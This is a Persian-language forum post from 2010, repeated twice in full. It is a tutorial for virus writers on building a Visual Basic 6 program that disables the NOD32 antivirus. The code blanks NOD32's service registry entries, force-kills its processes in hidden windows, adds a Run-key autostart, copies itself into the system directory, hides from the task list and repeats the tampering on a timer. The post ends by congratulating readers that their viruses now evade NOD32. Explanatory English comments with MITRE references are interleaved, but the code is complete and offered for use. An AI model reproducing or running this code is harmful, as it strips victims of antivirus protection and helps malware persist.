atena-ati
12th August 2010, 07:03 PM
در ابتدا باید عرض کنیم که از همه دوستانی که در بخش آنتی فعالیت میکنم پوزش میخوام که خلاف جهت اونها حرکت میکنم!!
یکی از دغدغه های تمایی کسانی که میخوان ویروس نویسی کنن اینه که آنتی ویروس خیلی سریع ویروس اونا رو شناسایی میکنه و از بین میبره
حالا واسه این مشکل چندتا راه حل وجود داره اینکه از پچر استفاده کنید که یه خورده قدیمی شده و دیگه کاربردی چندانی نداره و راه حلی که من پیشنهاد میکنم اینه که آنتی ویروس رو از کار بندازید . . . . http://www.p30i.com/forum/images/smilies/yahoo/13.gif ولی خدایی از من نشنیده بگیرین !!!
شروع میکنیم
برای این کار باید 6 مرحله را بگذرانید:
1-ویژوال بیسیک را اجرا کنید.standard exe را انتخاب و یک command و یک timer هم به form اضافه کنید و interval timer هم برابر 3000 قرار دهید.
2-روی form دو بار کلیک کنید و کدهای زیر را درونش وارد کنید:
' Form load body: hides the program from the user and, when it is the installed
' copy, runs the Command1 handler with no interaction.
' n is assigned here but is not read anywhere in the code shown.
n = 30
' Keeps the application out of the Windows task list.
App.TaskVisible = False
' True only when the executable is running from the system directory (see SysDir),
' i.e. the copy that the command handler places there.
If App.Path = SysDir Then
Me.Hide
App.TaskVisible = False
' Calls the click handler directly, so its statements run without a button press.
Command1_Click
End If
3-روی command دو بار کلیک کنید و کدهای زیر را درونش کپی کنید:
' Command1 click body. As written it tampers with an antivirus product's service
' configuration and processes, then registers an autostart entry
' (MITRE ATT&CK T1562.001 Impair Defenses, T1547.001 Registry Run Keys).
' Defender view: each step is observable - registry writes to a Services\...\ImagePath
' value and to a Run value by an arbitrary user-mode program, a new executable
' appearing in the system directory, and taskkill started with a hidden window.
' Writes an empty string to the "ImagePath" value under the three HKLM key paths given.
' SaveString discards the API return codes, so a denied write raises no error here.
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn ", "ImagePath", ""
' Adds a value named "AntiNod32" whose data is <system directory>\antinod32.exe
' under the HKCU path given.
SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run ", "AntiNod32", SysDir & "\antinod32.exe"
' Force-terminates the two named processes through taskkill; vbHide hides the console window.
Shell "taskkill /f /im NOD32KRN.EXE", vbHide
Shell "taskkill /f /im NOD32KUI.EXE", vbHide
' Only when not already running from the system directory: shows a message box,
' then copies the running executable into the system directory as antinod32.exe.
If App.Path <> SysDir Then
MsgBox "Nod32 Anti Virus Disabled Successfull !", vbInformation, "Anti Nod32"
FileCopy App.Path & "\" & App.EXEName & ".exe", SysDir & "\" & "antinod32.exe"
End If
4-در قسمت general فرم کد زیر را وارد کنید:
' Form-level counter. The form load code sets it to 30; nothing in the code shown reads it.
Dim n As Integer
5-در مرحله آخر،روی timer دوبار کلیک کنید و کدهای زیر را وارد کنید:
' Timer event body. Step 1 of the post sets the interval to 3000 ms, so these statements
' repeat on that period for as long as the program runs. They are the same registry
' writes and taskkill calls as the command handler, without the self-copy.
' Defender view: the repetition makes this noisy - the same registry values are rewritten
' and taskkill is spawned every few seconds, which process and registry auditing will show.
' Rewrites an empty "ImagePath" string under the three HKLM key paths given.
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn ", "ImagePath", ""
' Rewrites the "AntiNod32" value pointing at <system directory>\antinod32.exe.
SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run ", "AntiNod32", SysDir & "\antinod32.exe"
' Force-terminates the two named processes again; vbHide hides the console window.
Shell "taskkill /f /im NOD32KRN.EXE", vbHide
Shell "taskkill /f /im NOD32KUI.EXE", vbHide
6-یک module درست کنید(از منوی project ) و کدهای زیر را درونش کپی کنید:
' Module-level constants and Win32 API declarations used by the helpers below.
' Predefined registry hive handles.
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_CURRENT_USER = &H80000001
' ANSI registry entry points from advapi32.dll. RegDeleteKey and RegDeleteValue are
' declared but not called anywhere in the code shown.
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
' Registry value type codes passed to RegSetValueEx / compared after RegQueryValueEx.
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
' kernel32 entry points. GetSystemDirectory is used by SysDir; SetFileAttributes is
' declared but not called anywhere in the code shown.
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long
' Returns the Windows system directory path as reported by GetSystemDirectoryA.
' The rest of the post uses it both to test where the program is running from and
' as the destination for its copy.
Public Function SysDir() As String
Dim SysPath As String
' Pre-fill a 255-character buffer with NULs for the API to write into.
SysPath = String(255, vbNullChar)
' The API's return value (length or failure) is ignored.
GetSystemDirectory SysPath, 255
' Keep only the characters before the first NUL.
SysDir = Left(SysPath, InStr(SysPath, vbNullChar) - 1)
End Function
' Returns True when Dir finds an entry matching name, including read-only, hidden,
' system and archive files. Not called anywhere in the code shown.
Public Function exist(name As String) As Boolean
exist = (Dir(name, vbNormal Or vbReadOnly Or vbHidden Or vbSystem Or vbArchive) <> "")
End Function
' Reads a REG_SZ value: Hkey is the hive handle, strPath the subkey, strValue the value name.
' Returns the string data up to its first NUL. When the value is not REG_SZ or the read
' fails, nothing is assigned, so the untyped (Variant) result is left unset.
' Not called anywhere in the code shown.
' NOTE(review): r, lValueType and ERROR_SUCCESS are not declared in the code shown, and
' datatype is declared but unused - presumably the module relies on implicit Variants
' (no Option Explicit); confirm against the full module.
' NOTE(review): the opened key handle is never passed to RegCloseKey in this function.
Public Function GetString(Hkey As Long, strPath As String, strValue As String)
Dim keyhand As Long
Dim datatype As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
' Open result is stored but never checked.
r = RegOpenKey(Hkey, strPath, keyhand)
' First query passes a null data pointer to obtain the value type and required size.
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
If lValueType = REG_SZ Then
' Allocate a buffer of the reported size, then query again to fetch the data.
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
' Trim at the terminating NUL when one is present.
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GetString = Left$(strBuf, intZeroPos - 1)
Else
GetString = strBuf
End If
End If
End If
End Function
' Writes strdata as a REG_SZ value named strValue under subkey strPath of hive Hkey.
' RegCreateKey opens the subkey, creating it if it does not exist.
' Every API result is stored in r and overwritten without being checked, so any failure
' is silent.
' NOTE(review): writes beneath HKEY_LOCAL_MACHINE\SYSTEM normally require administrative
' rights, so under a standard-user account those calls are expected to fail - least
' privilege is a direct mitigation for what this post does with the helper.
Public Sub SaveString(Hkey As Long, strPath As String, strValue As String, strdata As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(Hkey, strPath, keyhand)
' Data length is Len(strdata); for an empty string that is 0 bytes.
r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
r = RegCloseKey(keyhand)
End Sub
' Writes lData as a 4-byte REG_DWORD value named strValueName under subkey strPath of
' hive Hkey, creating the subkey if needed. Declared as a Function but never assigns a
' return value; API results are stored and not checked. Not called in the code shown.
Function SaveDword(ByVal Hkey As Long, ByVal strPath As String, ByVal strValueName As String, ByVal lData As Long)
Dim lResult As Long
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(Hkey, strPath, keyhand)
' lpData is declared As Any (by reference), so the local copy of lData is passed by address.
lResult = RegSetValueEx(keyhand, strValueName, 0&, REG_DWORD, lData, 4)
r = RegCloseKey(keyhand)
End Function
تبریک می گم.حالا دیگه ویروس های شما از سد آنتی ویروس nod32 هم رد میشه.[tashvigh]
منبع:http://www.p30i.com/forum/showthread.php?t=6355 (http://njavan.com/forum/redirector.php?url=http%3A%2F%2Fwww.p30i.com%2Ffor um%2Fshowthread.php%3Ft%3D6355)
یکی از دغدغه های تمایی کسانی که میخوان ویروس نویسی کنن اینه که آنتی ویروس خیلی سریع ویروس اونا رو شناسایی میکنه و از بین میبره
حالا واسه این مشکل چندتا راه حل وجود داره اینکه از پچر استفاده کنید که یه خورده قدیمی شده و دیگه کاربردی چندانی نداره و راه حلی که من پیشنهاد میکنم اینه که آنتی ویروس رو از کار بندازید . . . . http://www.p30i.com/forum/images/smilies/yahoo/13.gif ولی خدایی از من نشنیده بگیرین !!!
شروع میکنیم
برای این کار باید 6 مرحله را بگذرانید:
1-ویژوال بیسیک را اجرا کنید.standard exe را انتخاب و یک command و یک timer هم به form اضافه کنید و interval timer هم برابر 3000 قرار دهید.
2-روی form دو بار کلیک کنید و کدهای زیر را درونش وارد کنید:
' Form load body: hides the program from the user and, when it is the installed
' copy, runs the Command1 handler with no interaction.
' n is assigned here but is not read anywhere in the code shown.
n = 30
' Keeps the application out of the Windows task list.
App.TaskVisible = False
' True only when the executable is running from the system directory (see SysDir),
' i.e. the copy that the command handler places there.
If App.Path = SysDir Then
Me.Hide
App.TaskVisible = False
' Calls the click handler directly, so its statements run without a button press.
Command1_Click
End If
3-روی command دو بار کلیک کنید و کدهای زیر را درونش کپی کنید:
' Command1 click body. As written it tampers with an antivirus product's service
' configuration and processes, then registers an autostart entry
' (MITRE ATT&CK T1562.001 Impair Defenses, T1547.001 Registry Run Keys).
' Defender view: each step is observable - registry writes to a Services\...\ImagePath
' value and to a Run value by an arbitrary user-mode program, a new executable
' appearing in the system directory, and taskkill started with a hidden window.
' Writes an empty string to the "ImagePath" value under the three HKLM key paths given.
' SaveString discards the API return codes, so a denied write raises no error here.
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn ", "ImagePath", ""
' Adds a value named "AntiNod32" whose data is <system directory>\antinod32.exe
' under the HKCU path given.
SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run ", "AntiNod32", SysDir & "\antinod32.exe"
' Force-terminates the two named processes through taskkill; vbHide hides the console window.
Shell "taskkill /f /im NOD32KRN.EXE", vbHide
Shell "taskkill /f /im NOD32KUI.EXE", vbHide
' Only when not already running from the system directory: shows a message box,
' then copies the running executable into the system directory as antinod32.exe.
If App.Path <> SysDir Then
MsgBox "Nod32 Anti Virus Disabled Successfull !", vbInformation, "Anti Nod32"
FileCopy App.Path & "\" & App.EXEName & ".exe", SysDir & "\" & "antinod32.exe"
End If
4-در قسمت general فرم کد زیر را وارد کنید:
' Form-level counter. The form load code sets it to 30; nothing in the code shown reads it.
Dim n As Integer
5-در مرحله آخر،روی timer دوبار کلیک کنید و کدهای زیر را وارد کنید:
' Timer event body. Step 1 of the post sets the interval to 3000 ms, so these statements
' repeat on that period for as long as the program runs. They are the same registry
' writes and taskkill calls as the command handler, without the self-copy.
' Defender view: the repetition makes this noisy - the same registry values are rewritten
' and taskkill is spawned every few seconds, which process and registry auditing will show.
' Rewrites an empty "ImagePath" string under the three HKLM key paths given.
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet\Services\NOD32krn", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet001\Services\NOD32krn ", "ImagePath", ""
SaveString HKEY_LOCAL_MACHINE, "SYSTEM\CurrentControlSet002\Services\NOD32krn ", "ImagePath", ""
' Rewrites the "AntiNod32" value pointing at <system directory>\antinod32.exe.
SaveString HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run ", "AntiNod32", SysDir & "\antinod32.exe"
' Force-terminates the two named processes again; vbHide hides the console window.
Shell "taskkill /f /im NOD32KRN.EXE", vbHide
Shell "taskkill /f /im NOD32KUI.EXE", vbHide
6-یک module درست کنید(از منوی project ) و کدهای زیر را درونش کپی کنید:
' Module-level constants and Win32 API declarations used by the helpers below.
' Predefined registry hive handles.
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_CURRENT_USER = &H80000001
' ANSI registry entry points from advapi32.dll. RegDeleteKey and RegDeleteValue are
' declared but not called anywhere in the code shown.
Declare Function RegCloseKey Lib "advapi32.dll" (ByVal Hkey As Long) As Long
Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String) As Long
Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal Hkey As Long, ByVal lpValueName As String) As Long
Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal Hkey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal Hkey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
' Registry value type codes passed to RegSetValueEx / compared after RegQueryValueEx.
Public Const REG_SZ = 1
Public Const REG_DWORD = 4
' kernel32 entry points. GetSystemDirectory is used by SysDir; SetFileAttributes is
' declared but not called anywhere in the code shown.
Public Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Public Declare Function SetFileAttributes Lib "kernel32" Alias "SetFileAttributesA" (ByVal lpFileName As String, ByVal dwFileAttributes As Long) As Long
' Returns the Windows system directory path as reported by GetSystemDirectoryA.
' The rest of the post uses it both to test where the program is running from and
' as the destination for its copy.
Public Function SysDir() As String
Dim SysPath As String
' Pre-fill a 255-character buffer with NULs for the API to write into.
SysPath = String(255, vbNullChar)
' The API's return value (length or failure) is ignored.
GetSystemDirectory SysPath, 255
' Keep only the characters before the first NUL.
SysDir = Left(SysPath, InStr(SysPath, vbNullChar) - 1)
End Function
' Returns True when Dir finds an entry matching name, including read-only, hidden,
' system and archive files. Not called anywhere in the code shown.
Public Function exist(name As String) As Boolean
exist = (Dir(name, vbNormal Or vbReadOnly Or vbHidden Or vbSystem Or vbArchive) <> "")
End Function
' Reads a REG_SZ value: Hkey is the hive handle, strPath the subkey, strValue the value name.
' Returns the string data up to its first NUL. When the value is not REG_SZ or the read
' fails, nothing is assigned, so the untyped (Variant) result is left unset.
' Not called anywhere in the code shown.
' NOTE(review): r, lValueType and ERROR_SUCCESS are not declared in the code shown, and
' datatype is declared but unused - presumably the module relies on implicit Variants
' (no Option Explicit); confirm against the full module.
' NOTE(review): the opened key handle is never passed to RegCloseKey in this function.
Public Function GetString(Hkey As Long, strPath As String, strValue As String)
Dim keyhand As Long
Dim datatype As Long
Dim lResult As Long
Dim strBuf As String
Dim lDataBufSize As Long
Dim intZeroPos As Integer
' Open result is stored but never checked.
r = RegOpenKey(Hkey, strPath, keyhand)
' First query passes a null data pointer to obtain the value type and required size.
lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
If lValueType = REG_SZ Then
' Allocate a buffer of the reported size, then query again to fetch the data.
strBuf = String(lDataBufSize, " ")
lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
If lResult = ERROR_SUCCESS Then
' Trim at the terminating NUL when one is present.
intZeroPos = InStr(strBuf, Chr$(0))
If intZeroPos > 0 Then
GetString = Left$(strBuf, intZeroPos - 1)
Else
GetString = strBuf
End If
End If
End If
End Function
' Writes strdata as a REG_SZ value named strValue under subkey strPath of hive Hkey.
' RegCreateKey opens the subkey, creating it if it does not exist.
' Every API result is stored in r and overwritten without being checked, so any failure
' is silent.
' NOTE(review): writes beneath HKEY_LOCAL_MACHINE\SYSTEM normally require administrative
' rights, so under a standard-user account those calls are expected to fail - least
' privilege is a direct mitigation for what this post does with the helper.
Public Sub SaveString(Hkey As Long, strPath As String, strValue As String, strdata As String)
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(Hkey, strPath, keyhand)
' Data length is Len(strdata); for an empty string that is 0 bytes.
r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strdata, Len(strdata))
r = RegCloseKey(keyhand)
End Sub
' Writes lData as a 4-byte REG_DWORD value named strValueName under subkey strPath of
' hive Hkey, creating the subkey if needed. Declared as a Function but never assigns a
' return value; API results are stored and not checked. Not called in the code shown.
Function SaveDword(ByVal Hkey As Long, ByVal strPath As String, ByVal strValueName As String, ByVal lData As Long)
Dim lResult As Long
Dim keyhand As Long
Dim r As Long
r = RegCreateKey(Hkey, strPath, keyhand)
' lpData is declared As Any (by reference), so the local copy of lData is passed by address.
lResult = RegSetValueEx(keyhand, strValueName, 0&, REG_DWORD, lData, 4)
r = RegCloseKey(keyhand)
End Function
تبریک می گم.حالا دیگه ویروس های شما از سد آنتی ویروس nod32 هم رد میشه.[tashvigh]
منبع:http://www.p30i.com/forum/showthread.php?t=6355 (http://njavan.com/forum/redirector.php?url=http%3A%2F%2Fwww.p30i.com%2Ffor um%2Fshowthread.php%3Ft%3D6355)